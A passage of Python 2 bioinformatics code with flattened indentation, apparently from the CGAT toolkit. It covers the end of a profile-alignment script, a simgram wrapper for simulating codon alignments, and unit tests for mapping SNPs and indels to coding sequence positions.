ntotal = len(pairs)
if options.loglevel >= 1:
options.stdlog.write( "# work: alignments=%i\n" % ( ntotal ) )
options.stdlog.flush()
last_query, last_sbjct = None, None
for query, sbjct in pairs:
if query != last_query:
query_profile = plib_query.getProfile( query )
last_query = query
if sbjct != last_sbjct:
sbjct_profile = plib_query.getProfile( sbjct )
last_sbjct = sbjct
npairs += 1
if __align( query_profile, sbjct_profile ):
noutput += 1
else:
nempty += 1
__report( npairs, ntotal )
else:
query_keys, query_start, query_end = getKeys( plib_query, options.query_start, options.query_end )
sbjct_keys, sbjct_start, sbjct_end = getKeys( plib_sbjct, options.sbjct_start, options.sbjct_end )
ntotal = len(query_keys) * len(sbjct_keys)
## subtract half-diagonal for self-comparisons. If query_end is smaller than
## sbjct_start, the full square is computed
if options.self_compare:
d = max( query_end - sbjct_start, 0 )
ntotal -= d * d / 2
if options.loglevel >= 1:
options.stdlog.write( "# work: queries=%i, sbjcts=%i, alignments=%i\n" % (len(query_keys), len(sbjct_keys), ntotal ) )
options.stdlog.flush()
for query in query_keys:
query_profile = plib_query.getProfile( query )
for sbjct in sbjct_keys:
if options.self_compare and query > sbjct: continue
sbjct_profile = plib_sbjct.getProfile( sbjct )
npairs += 1
if __align( query_profile, sbjct_profile ):
noutput += 1
else:
nempty += 1
__report( npairs, ntotal )
break
break
if options.loglevel >= 1:
t = time.time() - t_start
options.stdlog.write( "# alignment: %5i (%5.2f)%%, t=%is, t=%ih\n" %\
(noutput, 100.0 * noutput / ntotal,
t, t / 3600.0 ) )
if options.loglevel >= 1:
options.stdlog.write("# ninput=%i, noutput=%i, nempty=%i\n" % (ntotal, noutput, nempty) )
#--------------------------------------------------------
# general cleaning up
Experiment.Stop()
```
#### File: cgat/obsolete/simgram.py
```python
import os
import sys
import string
import re
import tempfile
import subprocess
import optparse
import time
import math
import shutil
import random
from types import *
USAGE = """python simgram.py [OPTIONS] < mali.in > out
Simulate alignments using simgram
"""
import CGAT.Experiment as Experiment
import CGAT.Mali as Mali
import CGAT.Genomics as Genomics
import CGAT.TreeTools as TreeTools
# imports for xrate computation
from XGram.Generator.Prebuilt import Codons
from XGram.Model import Annotation
import XGram.Run
from XGram.Generator.Prebuilt import DNA
import Bio.Data.CodonTable
class Error(Exception):
"""Base class for exceptions in this module."""
def __str__(self):
return str(self.message)
def _get_message(self, message): return self._message
def _set_message(self, message): self._message = message
message = property(_get_message, _set_message)
class ParsingError(Error):
"""Exception raised for errors while parsing
Attributes:
message -- explanation of the error
"""
def __init__(self, message, line):
self.message = message + " at line " + line
class UsageError(Error):
"""Exception raised for errors while starting
Attributes:
message -- explanation of the error
"""
def __init__(self, message):
self.message = message
class SimgramResult:
def __init__(self):
self.mStockholm = None
self.mMali = Mali.Mali()
class WrapperSimgram:
mExecutable = "simgram"
def __init__(self):
pass
##------------------------------------------------------------------------
def run( self,
grammar,
tree = None,
dump = 0,
test = False,
options = {} ):
self.mTempdir = tempfile.mkdtemp()
self.mFilenameGrammar = "grammar.eg"
self.mFilenameTree = "tree.nh"
self.mFilenameOutput = None
self.mWarnings = []
if test:
print "# temporary directory is %s" % self.mTempdir
outfile = open(self.mTempdir + "/" + self.mFilenameGrammar, "w")
outfile.write( grammar.getGrammar() )
outfile.close()
if tree:
outfile = open(self.mTempdir + "/" + self.mFilenameTree, "w" )
## check what kind of tree is given.
if type(tree) == StringType:
t = tree.strip()
if t[0] == "(" and t[-1] in ");":
outfile.write("%s\n" % t)
else:
nexus = TreeTools.Newick2Nexus( open(tree, "r" ) )
t = nexus.trees[0]
outfile.write("%s\n" % TreeTools.Tree2Newick(t))
outfile.close()
# use your own random seed. Time won't do, if simgram
# is called in quick succession.
# Are there any restrictions on seeds? Ian using an even number.
statement = "%s -rndseed %i -g %s -t %s" % (self.mExecutable,
random.randint(0, 4294967296),
self.mFilenameGrammar,
self.mFilenameTree )
s = subprocess.Popen( statement,
shell = True,
stdout = subprocess.PIPE,
stderr = subprocess.PIPE,
cwd = self.mTempdir,
close_fds = True)
(out, err) = s.communicate()
if s.returncode != 0:
raise UsageError, "Error in running %s \n%s\n%s\nTemporary directory in %s" % (self.mExecutable, err, out, self.mTempdir)
if dump:
print "# stdout output of %s:\n%s\n######################################" % (self.mExecutable, out)
if not test:
shutil.rmtree( self.mTempdir )
return self.parseOutput( out.split("\n") )
def parseOutput( self, lines ):
"""parse stdout output from simgram."""
result = SimgramResult()
result.mStockholm = lines
result.mMali.readFromFile( lines, format="stockholm" )
return result
##-----------------------------------------------------------------------------------
##-----------------------------------------------------------------------------------
##-----------------------------------------------------------------------------------
def writeModel( grammar, section, options):
"""write a model to output file."""
if section in options.write or "all" in options.write:
outfile = open( options.output_pattern % section, "w" )
outfile.write( "%s\n" % grammar.getGrammar())
outfile.close()
##-----------------------------------------------------------------------------------
##-----------------------------------------------------------------------------------
##-----------------------------------------------------------------------------------
def countSites( model ):
"""count number of expected synonymous/nonsynonymous sites in a grammar.
"""
## number of synonymous/non-synonymous sites
n, s = 0.0, 0.0
xpi = model.evaluateTerminalFrequencies()[('COD0', 'COD1', 'COD2')]
pi = {}
for codon, f in xpi.items():
pi["".join(codon).upper()] = f
## translate pi and the matrix to codons
for key, value in pi.items():
del pi[key]
pi["".join(key).upper()] = value
for codon, freq in pi.items():
try:
degeneracy = Genomics.GetDegeneracy( codon )
except KeyError:
continue
for x in range(1,4):
d = (degeneracy[x] - 1.0 ) / 3.0
s += freq * d
n += freq * (1.0-d)
## if degeneracy[x] > 1:
## s += freq
## else:
## n += freq
assert( float("%5.2f" % (n + s)) == 3.0 )
## print s / (n+s)
## n = 184.9
## s = 76.1
## t = n + s
## n /= t
## s /= t
## print s / (n+s)
return n, s
if __name__ == "__main__":
parser = optparse.OptionParser( version = "%prog version: $Id: simgram.py 2781 2009-09-10 11:33:14Z andreas $" )
parser.add_option( "-m", "--model", dest="model", type="choice",
choices=( "custom", "sn", "akaksgc", "K80", "f3x4-four" ),
help="grammar to use for simulation." )
parser.add_option("-i", "--input-format", dest="input_format", type="choice",
choices=("plain", "fasta", "clustal", "stockholm", "phylip" ),
help="input format of multiple alignment" )
parser.add_option("-o", "--output-format", dest="output_format", type="choice",
choices=("plain", "fasta", "clustal", "stockholm", "phylip" ),
help="output format of multiple alignment" )
parser.add_option( "--set-omega", dest="omega", type="float",
help="set omega (non-synonymous/synonymous rate ratio).")
parser.add_option( "--set-kappa", dest="kappa", type="float",
help="set kappa (transition/transversion ratio).")
parser.add_option( "--set-ds", dest="ds", type="float",
help="set divergence.")
parser.add_option("-w", "--write", dest="write", type="choice", action="append",
choices=("input_fixed", "trained_fixed", "input_variable", "trained_variable", "all" ),
help="output sections to write." )
parser.add_option( "--output-pattern", dest="output_pattern", type="string",
help="output pattern for output files." )
parser.add_option("--insert-frequencies", dest="insert_frequencies", type="string",
help="insert frequencies from a multiple alignment." )
parser.add_option("--uniform-frequencies", dest="insert_frequencies", action="store_false",
help="use uniform codon frequencies." )
parser.add_option( "--test", dest="test", action="store_true",
help="run a test." )
parser.add_option( "--dump", dest="dump", action="store_true",
help="dump output." )
parser.add_option( "--num-replicates", dest="num_replicates", type="int",
help="number of replicates to output." )
parser.add_option( "--length", dest="length", type="int",
help="length of simulated alignment. Set to 0 (default) for variable length." )
parser.add_option( "--remove-stop-codons", dest="remove_stop_codons", action="store_true",
help="remove positions in mali with stop-codons." )
parser.set_defaults(
input_format="fasta",
output_format="fasta",
model = "akaksgc",
omega = None,
kappa = None,
ds = None,
dump = False,
test = False,
insert_frequencies = None,
write = [],
output_pattern = "%s.eg",
value_format = "%6.4f",
debug = False,
fix_rates = None,
filename_grammar = None,
num_replicates = 1,
remove_stop_codons = False,
length = 0,
)
(options, args) = Experiment.Start( parser )
if options.fix_rates: options.fix_rates = map( float, options.fix_rates.split(",") )
if options.loglevel >= 1:
if options.omega:
o_omega = "%6.4f" % options.omega
else:
o_omega = "na"
if options.kappa:
o_kappa = "%6.4f" % options.kappa
else:
o_kappa = "na"
if options.ds:
o_ds = "%6.4f" % options.ds
else:
o_ds = "na"
options.stdlog.write("# input parameters: model=%s, ds=%s, omega=%s, kappa=%s\n" % ( options.model, o_ds, o_omega, o_kappa) )
## load a grammar
if options.model in ( "sn" , "akaksgc", "f3x4-four" ):
if options.model in ("sn", ):
infile = open(XGram.PATH_DATA + "/sn.eg", "r")
input_model = XGram.Parser.parseGrammar( infile.readlines() )
elif options.model in ( "akaksgc", ):
infile = open(XGram.PATH_DATA + "/akaksgc.eg", "r")
input_model = XGram.Parser.parseGrammar( infile.readlines() )
elif options.model in ( "f3x4-four", ):
input_model = Codons.buildCodonML(codon_model = options.model,
explicit_extension = True,
fix_kappa = options.kappa == None,
fix_omega = options.omega == None )
## set codon usage frequencies
if options.insert_frequencies:
mali = Mali.Mali()
mali.readFromFile( open(options.insert_frequencies, "r"),
format = options.input_format )
if mali.getLength() == 0:
raise "refusing to process empty alignment."
frequencies = Codons.getFrequenciesPerCodonPosition( map( lambda x: x.mString, mali.values() ))
# build a dummy grammar to insert frequencies
dummy_grammar = XGram.Model.Grammar()
for x in range(0,3):
params = []
for a in ('A', 'C', 'G', 'T'):
params.append( ("p%s%i" % (a.lower(), x), frequencies[x][a]) )
dummy_grammar.addVariable( params )
input_model.mGrammar.copyParameters( dummy_grammar,
ignore_missing = True)
## count the number of synonymous and non-synonymous sites
if options.omega or options.kappa:
n, s = countSites( input_model )
ps = s / (n + s )
if options.omega:
branchlength = 3 * options.ds * ( ps + options.omega * (1 - ps ) )
else:
branchlength = 3 * options.ds
if options.loglevel >= 1:
options.stdlog.write("# derived parameters: n=%6.4f, s=%6.4f, ps=%6.4f, branchlength=%6.4f\n" % (n, s, ps, branchlength ) )
if options.kappa and options.omega:
if options.model in ("akaksgc", ) :
n /= 3.0
s /= 3.0
rni = branchlength * n * options.omega * options.kappa
rsi = branchlength * s * options.kappa
rnv = branchlength * n * options.omega
rsv = branchlength * s
input_model.mGrammar.setParameter( "Rsi", rsi )
input_model.mGrammar.setParameter( "Rni", rni )
input_model.mGrammar.setParameter( "Rnv", rnv )
input_model.mGrammar.setParameter( "Rsv", rsv )
if options.loglevel >= 1:
options.stdlog.write("# computed parameters: rsi=%6.4f, rsv=%6.4f, rni=%6.4f, rnv=%6.4f\n" % (rsi, rsv, rni, rnv) )
elif options.model in ("f3x4-four", ):
# branchlength = 3 * options.ds
rni = 25.0 * branchlength * options.omega * options.kappa
rsi = 25.0 * branchlength * options.kappa
rnv = 25.0 * branchlength * options.omega
rsv = 25.0 * branchlength
input_model.mGrammar.setParameter( "Rsi", rsi )
input_model.mGrammar.setParameter( "Rni", rni )
input_model.mGrammar.setParameter( "Rnv", rnv )
input_model.mGrammar.setParameter( "Rsv", rsv )
if options.loglevel >= 1:
options.stdlog.write("# computed parameters: rsi=%6.4f, rsv=%6.4f, rni=%6.4f, rnv=%6.4f\n" % (rsi, rsv, rni, rnv) )
elif options.kappa:
## without omega, we have a plain nucleotide model.
## Because we work in codon space,
## the branch length needs to be 20 * 20 / 4 * 4 as long = 25
alpha = 25.0 * branchlength * options.kappa / (1.0 + 2.0 * options.kappa )
beta = 25.0 * branchlength / (1.0 + 2.0 * options.kappa )
input_model.mGrammar.setParameter( "kappa", alpha )
input_model.mGrammar.setParameter( "not_kappa", beta )
elif options.omega:
## without omega, we have a plain nucleotide model. Because we work in codon space,
## the branch length needs to be 20 * 20 / 4 * 4 as long = 25
omega = 25.0 * options.ds
not_omega = 25.0 * options.ds * options.omega
input_model.mGrammar.setParameter( "omega", omega )
input_model.mGrammar.setParameter( "not_omega", not_omega )
elif options.model in ("K80" ):
if not (options.omega == None or options.omega == 1.0):
raise "can only accept 1.0 for omega using the kimura model."
if options.model == "K80":
input_model = DNA.buildModel( substitution_model = "k80",
explicit_extension = True )
alpha = options.ds * options.kappa / (1.0 + 2.0 * options.kappa )
beta = options.ds / (1.0 + 2.0 * options.kappa )
if options.loglevel >= 1:
options.stdlog.write("# computed parameters: alpha=%6.4f, beta=%6.4f\n" % (alpha, beta) )
input_model.mGrammar.setParameter( "alpha", alpha )
input_model.mGrammar.setParameter( "beta", beta )
## set ext and not_ext to allow for long chains
input_model.mGrammar.setParameter( "ext", "0.999" )
input_model.mGrammar.setParameter( "not_ext", "0.001" )
writeModel( input_model, "input", options )
simgram = WrapperSimgram()
noutput = 0
last_mali = None
while noutput < options.num_replicates:
result = simgram.run( input_model, tree = "(seq1:1.0)seq2;",
dump = options.dump,
test = options.test )
mali = result.mMali
if options.remove_stop_codons:
mali.removePattern( lambda x: x.upper() in ("TAG", "TAA", "TGA"),
allowed_matches = 0,
minimum_matches = 1,
frame = 3 )
width = mali.getWidth()
mali.truncate( 0, 3 * int(math.floor( width / 3.0 ) ) )
if options.loglevel >= 1:
options.stdlog.write("# received mali: %i sequences, %i columns.\n" % (mali.getLength(), mali.getWidth()))
if last_mali:
for key, value in last_mali.items():
mali.getEntry(key).mString += value.mString
if options.loglevel >= 1:
options.stdlog.write("# cumulative mali: %i sequences, %i columns.\n" % (mali.getLength(), mali.getWidth()))
output = True
if options.length:
if mali.getWidth() > options.length:
mali.truncate( 0, options.length )
output = True
elif mali.getWidth() < options.length:
output = False
if output:
noutput += 1
mali.writeToFile( sys.stdout, format = options.output_format )
last_mali = mali
Experiment.Stop()
```
#### File: cgat/obsolete/snp2counts_test.py
```python
import sys
import os
import shutil
import optparse
import random
import math
import unittest
import tempfile
import snp2counts
import CGAT.GTF as GTF
import CGAT.Genomics as Genomics
import CGAT.IndexedFasta as IndexedFasta
class getCDSPositionTestPos(unittest.TestCase):
def setUp(self):
self.mExons = []
self.mSplitCodonsNext = {}
self.mSplitCodonsPrev = {}
self.mSpliceSize = 4
self.mExonSize = 100
self.mIntronSize = 900
self.strand = "+"
self.mNExons = 9
self.mOffset = 1000
length = 0
self.frame = 0
self.mIncrement = self.mIntronSize + self.mExonSize
seq = list("123" * int((self.mNExons * self.mExonSize) / 3))
exon_id = 0
start = self.mOffset
for x in range(self.mNExons):
e = GTF.Entry()
e.contig, e.strand, e.gene_id, e.transcript_id = "chr1", "+", "gene1", "trans1"
e.start, e.end = start, start + self.mExonSize
e.frame = (3 - (length % 3)) % 3
length += e.end - e.start
self.mExons.append(e)
if e.frame != 0:
for y in range(0, e.frame):
self.mSplitCodonsPrev[start + y] = start - self.mIntronSize
for y in range(0, 3 - e.frame):
self.mSplitCodonsNext[
start - self.mIntronSize - y - 1] = start
exon_id += 1
if exon_id < self.mNExons:
p = exon_id * self.mExonSize + self.mIntronSize * (exon_id - 1)
seq[p:p] = list("AG")
seq[p:p] = list("T" * (self.mIntronSize - 4))
seq[p:p] = list("GT")
start += self.mIncrement
# print str(e)
# print self.mSplitCodonsNext
# print self.mSplitCodonsPrev
seq[0:0] = "C" * self.mOffset
seq.append("G" * self.mOffset)
tmpfile = tempfile.NamedTemporaryFile()
tmpfile.close()
seq = "".join(seq)
self.mSequence = seq
self.contigSize = len(seq)
IndexedFasta.createDatabase(tmpfile.name, iter([("chr1", seq), ]))
self.mFasta = IndexedFasta.IndexedFasta(tmpfile.name)
def tearDown(self):
os.unlink(self.mFasta.getDatabaseName())
os.unlink(self.mFasta.getDatabaseName()[:-len(".fasta")] + ".idx")
def toRange(self, x, y):
'''convert snp to positive strand base.'''
if self.strand == "+":
return x, y
else:
return self.contigSize - y, self.contigSize - x
def testCodingSNPs(self):
length = 0
framed_length = (3 - self.frame) % 3
phase = (3 - self.frame) % 3
if self.strand == "+":
motif = "123"
else:
motif = "321"
for x in range(self.mOffset, self.contigSize - self.mOffset, self.mIncrement):
for y in range(0, self.mExonSize):
base = x + y
rangex, rangey = self.toRange(base, base + 1)
result = snp2counts.getCDSPosition(self.mExons, rangex, rangey,
lcontig=self.contigSize,
fasta=self.mFasta)
self.assertEqual(result.strand, self.strand)
self.assertEqual(result.cds_start, length)
self.assertEqual(result.cds_end, length + 1)
self.assertEqual(result.cds_phase, phase)
self.assertEqual(result.intron_start, None)
self.assertEqual(result.intron_end, None)
self.assertEqual(len(result.cds_seq), 3)
# print x, y, base, str(result)
if self.frame == 0:
self.assertEqual(result.cds_seq, motif)
self.assertEqual(result.cds_seq_start, framed_length % 3)
self.assertEqual(result.cds_seq_end, (framed_length % 3) + 1)
self.assertEqual(result.nc_seq, None)
self.assertEqual(result.nc_start, None)
self.assertEqual(result.nc_end, None)
if base in self.mSplitCodonsPrev:
self.assertEqual(
result.prev_exon_end, self.mSplitCodonsPrev[base])
else:
self.assertEqual(result.prev_exon_end, None)
if base in self.mSplitCodonsNext:
self.assertEqual(
result.next_exon_start, self.mSplitCodonsNext[base])
else:
self.assertEqual(result.next_exon_start, None)
length += 1
framed_length += 1
phase += 1
if phase >= 3:
phase = 0
def testIntronsSNPs(self):
length = 0
t = 0
exon_id = 0
for x in range(self.mOffset, self.contigSize - self.mIncrement - self.mOffset, self.mIncrement):
# exons
for y in range(0, self.mExonSize):
base = x + y
base_x, base_y = self.toRange(base, base + 1)
result = snp2counts.getCDSPosition(
self.mExons, base_x, base_y, lcontig=self.contigSize, fasta=self.mFasta)
self.assertEqual(result.strand, self.strand)
self.assertEqual(result.cds_start, t)
self.assertEqual(result.cds_end, t + 1)
self.assertEqual(result.intron_start, None)
self.assertEqual(result.intron_end, None)
self.assertEqual(len(result.cds_seq) % 3, 0)
self.assertEqual(result.nc_seq, None)
self.assertEqual(result.nc_start, None)
self.assertEqual(result.nc_end, None)
self.assertEqual(result.exon_id, exon_id)
self.assertEqual(result.intron_id, None)
t += 1
exon_id += 1
# introns
for y in range(self.mExonSize, self.mExonSize + self.mIntronSize):
base = x + y
base_x, base_y = self.toRange(base, base + 1)
result = snp2counts.getCDSPosition(
self.mExons, base_x, base_y, lcontig=self.contigSize, fasta=self.mFasta)
self.assertEqual(result.strand, self.strand)
self.assertEqual(result.cds_start, None)
self.assertEqual(result.cds_end, None)
self.assertEqual(result.cds_phase, None)
self.assertEqual(result.intron_start, x + self.mExonSize)
self.assertEqual(
result.intron_end, x + self.mIntronSize + self.mExonSize)
self.assertEqual(result.cds_seq, None)
self.assertEqual(result.cds_seq_start, None)
self.assertEqual(result.cds_seq_end, None)
self.assertEqual(len(result.nc_seq), 1)
self.assert_(result.nc_seq not in "abc")
self.assertEqual(result.nc_start, base)
self.assertEqual(result.nc_end, base + 1)
self.assertEqual(result.exon_id, exon_id)
self.assertEqual(result.intron_id, exon_id - 1)
def testIndels(self):
'''test with segments of size 5'''
size = 5
length = 0
framed_length = (3 - self.frame) % 3
phase = (3 - self.frame) % 3
if self.strand == "+":
motif = "123"
else:
motif = "321"
for x in range(self.mOffset, self.contigSize - self.mIncrement - self.mOffset, self.mIncrement):
for y in range(-2 * size, self.mExonSize + 2 * size):
base = x + y
if base < self.mOffset:
continue
base_x, base_y = self.toRange(base, base + size)
result = snp2counts.getCDSPosition(
self.mExons, base_x, base_y, lcontig=self.contigSize, fasta=self.mFasta)
if -size < y < self.mExonSize:
# overlap with coding sequence
self.assertEqual(len(result.cds_seq) % 3, 0)
self.assertEqual(result.cds_start, length)
if y < 0:
self.assertEqual(result.cds_end, length + size + y)
else:
self.assertEqual(
result.cds_end, length + min(size, self.mExonSize - y))
self.assertEqual(result.cds_phase, phase)
self.assertEqual(result.strand, self.strand)
ncodons = int(
math.ceil((result.cds_phase + result.cds_end - result.cds_start) / 3.0))
if self.frame == 0:
self.assertEqual(result.cds_seq, motif * ncodons)
self.assertEqual(result.cds_seq_start, framed_length % 3)
self.assertEqual(
result.cds_seq_end, framed_length % 3 + min(size, size + y, self.mExonSize - y))
if result.nc_end is not None:
self.assertEqual(
result.cds_end - result.cds_start + (result.nc_end - result.nc_start), size)
self.assertEqual(
len(result.nc_seq), (result.nc_end - result.nc_start))
else:
self.assertEqual(result.cds_start, None)
self.assertEqual(result.cds_end, None)
self.assertEqual(result.cds_phase, None)
if y > self.mExonSize - size:
self.assertEqual(result.intron_start, x + self.mExonSize)
self.assertEqual(
result.intron_end, x + self.mIntronSize + self.mExonSize)
elif y < 0:
self.assertEqual(result.intron_start, x - self.mIntronSize)
self.assertEqual(result.intron_end, x)
if 0 <= y < self.mExonSize:
length += 1
framed_length += 1
phase += 1
if phase >= 3:
phase = 0
class getCDSPositionTestNeg(getCDSPositionTestPos):
def setUp(self):
getCDSPositionTestPos.setUp(self)
for x in self.mExons:
x.start, x.end = self.contigSize - x.end, self.contigSize - x.start
x.strand = "-"
# frame remains
self.mExons.reverse()
self.strand = "-"
class getCDSPositionTestWithStartingFrame2(getCDSPositionTestPos):
'''test with a transcript not starting at frame 0, but at frame 2.'''
def setUp(self):
getCDSPositionTestPos.setUp(self)
self.mSplitCodonsNext = {}
self.mSplitCodonsPrev = {}
start = self.mOffset
l = 1
for exon_id, e in enumerate(self.mExons):
e.frame = (3 - l % 3) % 3
l += e.end - e.start
if e.frame != 0:
if exon_id > 0:
for y in range(0, e.frame):
self.mSplitCodonsPrev[
start + y] = start - self.mIntronSize
if exon_id < self.mNExons - 1:
for y in range(0, 3 - e.frame):
self.mSplitCodonsNext[
start - self.mIntronSize - y - 1] = start
start += self.mIncrement
self.frame = self.mExons[0].frame
# for e in self.mExons:
# print str(e)
# print self.mSplitCodonsPrev
# print self.mSplitCodonsNext
class iterateOverFrames(unittest.TestCase):
def setUp(self):
self.seq = list("AAA" * 20)
self.length = len(self.seq)
self.ncodons = self.length / 3
def merge(self, result):
n = []
last = result[0]
for this in result[1:]:
if last[0] == this[0]:
last[-1] = this[-1]
else:
n.append(tuple(last))
last = this
n.append(tuple(last))
return n
def testDeletion(self):
'''test single deletion.'''
for l in range(1, 7):
for x in range(0, len(self.seq)):
s = list(self.seq)
todelete = min(l, self.length - x)
for y in range(x, x + todelete):
s[y] = ""
ncodons = self.ncodons - todelete // 3
i = list(snp2counts.iterateOverFrames(s))
codon_start = (x // 3) * 3
codon_end = min(self.length, x + l + (3 - (x + l) % 3) % 3)
result = []
if codon_start > 0:
result.append([True, 0, codon_start])
if todelete % 3 == 0:
if x % 3 != 0:
result.append([False, codon_start, codon_end])
if codon_end < self.length:
result.append([True, codon_end, self.length])
else:
result.append([True, codon_start, self.length])
else:
o = codon_start
if todelete > 3 and x % 3 == 0:
o = codon_start + (todelete // 3) * 3
result.append([True, codon_start, o])
result.append([False, o, codon_end])
result.append([False, codon_end, self.length])
result = self.merge(result)
self.assertEqual(i, result)
def testInsertion(self):
'''test single insertion.'''
for l in range(1, 7):
for x in range(len(self.seq)):
s = list(self.seq)
s[x] = "A" * l + s[x]
i = list(snp2counts.iterateOverFrames(s))
result = []
codon_start = (x // 3) * 3
if codon_start > 0:
result.append([True, 0, codon_start])
if l % 3 == 0:
result.append([True, 0, self.length])
else:
result.append([False, codon_start, self.length])
result = self.merge(result)
self.assertEqual(i, result)
class countEffectsOnTranscript(unittest.TestCase):
'''test countEffectsOnTranscript'''
def setUp(self):
self.seq = list("AAA" * 20)
self.length = len(self.seq)
self.ncodons = self.length / 3
def testEmpty(self):
r = snp2counts.countEffectsOnTranscript(self.seq, self.seq)
self.assertEqual(r.ninserted_bases, 0)
self.assertEqual(r.ninserted_codons, 0)
self.assertEqual(r.ndeleted_bases, 0)
self.assertEqual(r.ndeleted_codons, 0)
self.assertEqual(r.noframe_codons, 0)
self.assertEqual(r.nwrong_frames, 0)
self.assertEqual(r.ncorrected_frames, 0)
self.assertEqual(r.first_stop, self.ncodons)
self.assertEqual(r.nstop_codons, 0)
self.assertEqual(r.nstops, 0)
self.assertEqual(r.nunaffected_codons, self.ncodons)
self.assertEqual(r.nsynonymous_codons, 0)
self.assertEqual(r.nnonsynonymous_codons, 0)
def testInsertion(self):
'''test single insertion.'''
for l in range(1, 7):
for x in range(len(self.seq)):
s = list(self.seq)
s[x] = "A" * l + s[x]
r = snp2counts.countEffectsOnTranscript(s, self.seq)
# print s, str(r)
self.assertEqual(r.ninserted_bases, l)
if l % 3 == 0:
self.assertEqual(r.ninserted_codons, l // 3)
self.assertEqual(r.nwrong_frames, 0)
self.assertEqual(r.ndeleted_bases, 0)
self.assertEqual(r.ndeleted_codons, 0)
unaffected = x // 3
if l % 3 == 0:
self.assertEqual(r.noframe_codons, 0)
self.assertEqual(r.ncorrected_frames, 0)
self.assertEqual(r.nunaffected_codons, 20)
self.assertEqual(r.nsynonymous_codons, 0)
else:
self.assertEqual(r.noframe_codons, self.ncodons - x / 3)
self.assertEqual(r.ncorrected_frames, 0)
self.assertEqual(r.nunaffected_codons, unaffected)
self.assertEqual(r.first_stop, (self.length + l) // 3)
self.assertEqual(r.nnonsynonymous_codons, 0)
def testDeletion(self):
'''test single deletion.'''
for l in range(1, 7):
for x in range(0, len(self.seq)):
s = list(self.seq)
todelete = min(l, self.length - x)
for y in range(x, x + todelete):
s[y] = ""
ncodons = self.ncodons - todelete // 3
r = snp2counts.countEffectsOnTranscript(s, self.seq)
# print s, str(r)
self.assert_(r.ndeleted_codons + r.nunaffected_codons + r.nincomplete_codons +
r.nnonsynonymous_codons + r.nsynonymous_codons + r.nstop_codons <=
self.ncodons)
self.assertEqual(r.ninserted_bases, 0)
self.assertEqual(r.ninserted_codons, 0)
self.assertEqual(r.ndeleted_bases, todelete)
codon_start = (x // 3) * 3
codon_end = x + l + (3 - (x + l) % 3) % 3
affected_codons = (codon_end - codon_start) // 3
deletion_codon_start = x + (3 - (x % 3)) % 3
deletion_codon_end = min(self.length, ((x + l) // 3) * 3)
# subtract fully deleted codons
deleted_codons = max(
0, (deletion_codon_end - deletion_codon_start) // 3)
self.assertEqual(r.ndeleted_codons, deleted_codons)
inframe = x // 3
# delete in-frame, multiple of 3
if x % 3 == 0 and todelete % 3 == 0:
self.assertEqual(r.noframe_codons, 0)
self.assertEqual(r.nwrong_frames, 0)
self.assertEqual(r.ncorrected_frames, 0)
self.assertEqual(r.nsynonymous_codons, 0)
# delete out-of-frame, multiple of 3
elif x % 3 != 0 and todelete % 3 == 0:
self.assertEqual(
r.noframe_codons, affected_codons - deleted_codons)
self.assertEqual(r.nwrong_frames, 1)
self.assertEqual(r.ncorrected_frames, 1)
# delete, but not multiple of 3
else:
self.assertEqual(
r.noframe_codons, self.ncodons - inframe - deleted_codons)
self.assertEqual(r.nwrong_frames, 1)
self.assertEqual(r.ncorrected_frames, 0)
# self.assertEqual( r.nsynonymous_codons,
# self.ncodons - r.nincomplete_codons - inframe - deleted_codons)
self.assertEqual(r.first_stop, (self.length - todelete) // 3)
# self.assertEqual( r.nunaffected_codons, self.ncodons - (int(math.ceil( (x + todelete) / 3.0)) - x // 3) )
self.assertEqual(r.nnonsynonymous_codons, 0)
def testFrameCorrectionAdacent(self):
'''test frame correction within a codon for
two adjacent bases.
Strictly speaking this should not happen as these
would be called as substitutions.
'''
return
for l in range(1, 7):
for x in range(len(self.seq) - l):
s = list(self.seq)
todelete = l
toinsert = l
for y in range(x, x + todelete):
s[y] = ""
s[x + todelete] = "A" * toinsert + s[x + todelete]
ncodons = self.ncodons
# print l,x,todelete, toinsert
# print s
r = snp2counts.countEffectsOnTranscript(s, self.seq)
# print str(r)
self.assert_(r.ndeleted_codons + r.nunaffected_codons + r.nincomplete_codons +
r.nnonsynonymous_codons + r.nsynonymous_codons + r.nstop_codons <=
self.ncodons)
self.assertEqual(r.ninserted_codons, 0)
if (x + todelete) % 3 != 0:
self.assertEqual(r.ninserted_bases, 0)
self.assertEqual(r.ndeleted_bases, 0)
self.assertEqual(r.noframe_codons, 0)
else:
self.assertEqual(r.ninserted_bases, toinsert)
self.assertEqual(r.ndeleted_bases, todelete)
self.assertEqual(r.noframe_codons, 2)
if x % 3 == 0 and todelete % 3 == 0:
self.assertEqual(r.ndeleted_codons, todelete / 3)
else:
self.assertEqual(r.ndeleted_codons, 0)
self.assert_(r.noframe_codons <= self.ncodons)
self.assertEqual(r.nwrong_frames, 1)
self.assertEqual(r.ncorrected_frames, 1)
self.assertEqual(r.ntruncated_codons_stop, 0)
# self.assertEqual( r.nunaffected_codons, self.ncodons )
self.assertEqual(r.nsynonymous_codons, 0)
self.assertEqual(r.nnonsynonymous_codons, 0)
def testFrameCorrection(self):
'''test frame correction within a codon for
two adjacent bases.
Strictly speaking this should not happen as these
would be called as substitutions.
'''
return
for l in range(1, 7):
for offset in range(1, 5):
for x in range(len(self.seq) - (l + offset)):
s = list(self.seq)
todelete = l
toinsert = l
for y in range(x, x + todelete):
s[y] = ""
codon_start = (x // 3) * 3
codon_end = ((x + offset + todelete) // 3 + 1) * 3
s[x + todelete + offset] = "A" * toinsert + s[x + todelete]
ncodons = self.ncodons
# print "l=",l,"x=",x,"offest=",offset,"del=",todelete,
# "ins=",toinsert, "start=",codon_start, "end=", codon_end
naffected_codons = (codon_end - codon_start) // 3
if todelete % 3 == 0 and (x + todelete) // 3 != (x + todelete + offset) // 3:
# affected codons reduced, if offset includes full
# codons
naffected_codons -= (x + todelete +
offset) // 3 - (x + todelete) // 3
# if offset > 3:
# naffected_codons -= 1
# print s
r = snp2counts.countEffectsOnTranscript(s, self.seq)
# print str(r)
self.assertEqual(r.ninserted_codons, l // 3)
self.assertEqual(r.ninserted_bases, toinsert)
self.assertEqual(r.ndeleted_bases, todelete)
if l + offset <= 2 and x % 3 == 0 or (x % 3 == 0 and l % 3 == 0):
# within codon correction
self.assertEqual(r.noframe_codons, 0)
self.assertEqual(r.nwrong_frames, 0)
self.assertEqual(r.ncorrected_frames, 0)
else:
# between codon correction
self.assertEqual(r.ninserted_bases, toinsert)
self.assertEqual(r.ndeleted_bases, todelete)
self.assertEqual(r.noframe_codons, naffected_codons)
self.assertEqual(r.nwrong_frames, 1)
self.assertEqual(r.ncorrected_frames, 1)
if x % 3 == 0 and todelete % 3 == 0:
self.assertEqual(r.ndeleted_codons, todelete / 3)
